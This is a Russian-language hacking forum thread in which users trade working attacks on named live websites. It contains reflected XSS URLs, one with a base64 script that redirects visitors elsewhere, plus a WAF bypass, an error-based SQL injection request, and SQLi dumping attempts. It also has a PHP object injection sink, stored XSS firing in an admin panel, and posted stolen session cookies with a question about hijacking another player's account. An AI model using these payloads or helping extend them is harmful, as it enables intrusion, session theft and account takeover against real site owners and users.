Вот так работает: Code: http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%3EsetTimeout%28%22alert%28123%29%22,1000%29;%3C/script%3E%3Ca%20x=%22 Связано это с тем, что происходит назначение window.alert=function(text){$.DF.Popup.open из файла http://100ads.net/scripts/df.js и в это же самое время мы вызываем функцию алерт. Если добавить таймаут все ок
Спрашивал с одного форума и вот что говорят,цитирую : "Он явно посчитал page за число и каким-то образом сделал из него -1, умножив затем на количество элементов, которые нужно достать, получив offset равный -7. Я полагаю, там (int) $_GET['page'], а дальше просто ошибка алгоритма, так что это не инъекция."
Подскажите пожалуйста. Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее. Пробывал так unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится. convert(group_concat(users)+using+ascii) пустое поле выдает. CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION' Как быть?
Раскрутить не получилось, но XSS получилось. Code: xss http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,YWxlcnQoL1hTU1BPU0VELyk=%3E http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,ZG9jdW1lbnQubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vZm9ydW0uYW50aWNoYXQucnUnOw==%3E WAF только на формы, обход через Request_Uri
Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет?
Помогите, попал в тупик. Вот страница - http://www.ezar.ru/?a=reg Поле "логин" уязвимое, посылается форма через POST на http://www.ezar.ru/prereg.php , там вылетает Warning: mysql_num_rows() Что делать дальше? Попробовал подбирать поля, подменяя запросы через Burp, но что то нифига не получается.
Пока мы попытаемся помочь Вам из SqlInj, можете поиграться с ихними XSS: Code: 1) http://www.ezar.ru/testd.php?domain=ezar.ru&nick=<img/src="x"/onerror=alert(/XSSPOSED/);> 2) url: http://www.ezar.ru/prereg.php POST: tarif=10&konstrukotor=yes&login=11&nick2=%3Cscript%3Ealert%28%2fXSSPOSED%2f%29%3B%3C%2fscript%3E&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK Чтобы не мучится с POST, работайте так: Code: http://www.ezar.ru/prereg.php?tarif=10&konstrukotor=yes&nick2=nick&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK&login='
подскажите как юзнуть ету уязвимость Code: PHP Object Injection Userinput reaches sensitive sink. For more information, press the help icon on the left side. 12: unserialize $data = unserialize($compressed); 9: $compressed = base64_decode($cookieData); 8: $cookieData = str_replace('#', '+', $cookieData); 6: $cookieData = $_COOKIE['___389_shR7_ZeE'];
изучите данный материал для начала https://rdot.org/forum/showthread.php?t=950 http://raz0r.name/tag/unserialize/
Code: POST /calc/save_form/ HTTP/1.1 Host: www.fortun.ru User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.fortun.ru/calc/ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 18 element%5B28|extractvalue(1,concat(0x3a,(select version())))%5D=on
Привет всем,нашел атаку на сайте при создание ника можно в поле ника вписывать разные скрипты и все робит,допустим вписываю ява скрипт алерт и сообщение вылазит везде где отображается мой ник и еще когда захожу в админ панель и там скрипт тоже исполняется но собственно сам вопрос как можно взломать сайт при поможи этого?
Привет всем,вот мне приходят куки с форума игры. ------------------------------------------------------------------------------------------------------ w2vL_cca8_lastvisit=1437004847; w2vL_cca8_nofavfid=1; PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3; w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc7NidwNkrv05%2F53l2Qado4EaUbTuI; w2vL_cca8_lastcheckfeed=21728%7C1437560824; w2vL_cca8_visitedfid=45D46D53D2; w2vL_cca8_viewid=tid_6189; w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_1437524926D_46_1437525191D_45_1437561663; w2vL_cca8_smile=1D1; __zlcmid=Vienkp6pQjrijA; _ga=GA1.2.956537111.1436906922F; w2vL_cca8_lastact=1437566946%09forum.php%09; w2vL_cca8_onlineusernum=59; w2vL_cca8_sid=ro6N6g ------------------------------------------------------------------------------------------------------ Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса. ------------------------------------------------------------------------------------------------------ 1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3 2)_ga=GA1.2.956537111.1436906922F ------------------------------------------------------------------------------------------------------ Но когда заменяю на форуме ,куки не подмениваются. ------------------------------------------------------------------------------------------------------ Сайт выглядит такого типа www.site.ru/forum/forum.php На www.site.ru расположен профиль игрока,тут короче выбираешь сервер и играешь. На /forum/forum.php расположен мой ява скрипт но подмена куки почему то тут не робит. В чем может быть проблема?